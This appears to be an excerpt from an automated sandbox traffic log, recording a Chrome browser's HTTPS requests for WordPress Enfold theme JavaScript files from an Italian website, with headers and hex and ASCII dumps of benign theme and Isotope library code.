                                                                                                                                              2025-01-03 16:33:05 UTC5498INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <meta name="viewp


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              118192.168.2.164984689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:05 UTC538OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:05 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 685
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC685INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 49 63 6f 6e 6c 69 73 74 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Iconlist shortcode javascript// ----------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              119192.168.2.164984989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC721OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:06 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 11409
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:06 UTC11409INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 76 69 61 20 41 4a 41 58 20 50 6f 72 74 66 6f 6c 69 6f 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 24 2e 61 76 69 61 5f 75 74
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Avia AJAX Portfolio// -------------------------------------------------------------------------------------------(function($){ "use strict";$.avia_ut


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              120192.168.2.164985089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC550OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:06 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 784
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:06 UTC784INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 56 49 41 20 49 6d 61 67 65 20 48 6f 74 73 70 6f 74 73 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// AVIA Image Hotspots// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avi


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              121192.168.2.164985189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC538OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:06 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 1782
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:06 UTC1782INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 4d 61 67 61 7a 69 6e 65 20 66 75 6e 63 74 69 6f 6e 20 66 6f 72 20 6d 61 67 61 7a 69 6e 65 20 73 6f 72 74 69 6e 67 0a 2f 2f 20 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA Magazine function for magazine sorting// // -------------------------------------------------------------------------------------------(function(


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              122192.168.2.164985389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC552OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:06 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 8056
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:06 UTC8056INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 4d 61 73 6f 6e 72 79 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69 61 5f 6d 61 73 6f 6e 72 79 20 3d 20
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Masonry// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avia_masonry =


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              123192.168.2.164985289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC725OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:06 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 908
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:06 UTC908INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 50 72 6f 67 72 65 73 73 20 62 61 72 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Progress bar shortcode javascript// ------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              124192.168.2.164985789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC530OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:06 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 3874
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:06 UTC3874INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 09 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 7b 09 0a 09 09 20 2f 2f 61 63 74 69 76 61 74 65 73 20 74 68 65 20 73 74 69 63 6b 79 20 73 75 62 6d 65 6e 75 0a 09 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 69 66 28 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 2e 61 76 69 61 5f 73 74 69 63 6b 79 5f 73 75 62 6d 65 6e 75 29 0a 09 09 24 2e 61 76 69 61 5f 75 74 69 6c
                                                                                                                                              Data Ascii: (function($){ "use strict";$.avia_utilities = $.avia_utilities || {};$(document).ready(function() { //activates the sticky submenu$.avia_utilities = $.avia_utilities || {}; if($.avia_utilities.avia_sticky_submenu)$.avia_util


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              125192.168.2.164985489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC538OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 49143
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC16107INData Raw: 2f 2a 21 0a 20 2a 20 49 73 6f 74 6f 70 65 20 50 41 43 4b 41 47 45 44 20 76 33 2e 30 2e 35 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 47 50 4c 76 33 20 66 6f 72 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 75 73 65 0a 20 2a 20 6f 72 20 49 73 6f 74 6f 70 65 20 43 6f 6d 6d 65 72 63 69 61 6c 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 0a 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 69 73 6f 74 6f 70 65 2e 6d 65 74 61 66 69 7a 7a 79 2e 63 6f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 37 20 4d 65 74 61 66 69 7a 7a 79 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 6a 71
                                                                                                                                              Data Ascii: /*! * Isotope PACKAGED v3.0.5 * * Licensed GPLv3 for open source use * or Isotope Commercial License for commercial use * * https://isotope.metafizzy.co * Copyright 2017 Metafizzy */!function(t,e){"function"==typeof define&&define.amd?define("jq
                                                                                                                                              2025-01-03 16:33:07 UTC16384INData Raw: 72 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 21 74 2e 69 73 49 67 6e 6f 72 65 64 7d 29 7d 2c 63 2e 5f 6c 61 79 6f 75 74 49 74 65 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 68 69 73 2e 5f 65 6d 69 74 43 6f 6d 70 6c 65 74 65 4f 6e 49 74 65 6d 73 28 22 6c 61 79 6f 75 74 22 2c 74 29 2c 74 26 26 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 69 3d 5b 5d 3b 74 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 4c 61 79 6f 75 74 50 6f 73 69 74 69 6f 6e 28 74 29 3b 6f 2e 69 74 65 6d 3d 74 2c 6f 2e 69 73 49 6e 73 74 61 6e 74 3d 65 7c 7c 74 2e 69 73 4c 61 79 6f 75 74
                                                                                                                                              Data Ascii: rLayout=function(t){return t.filter(function(t){return!t.isIgnored})},c._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),t&&t.length){var i=[];t.forEach(function(t){var o=this._getItemLayoutPosition(t);o.item=t,o.isInstant=e||t.isLayout
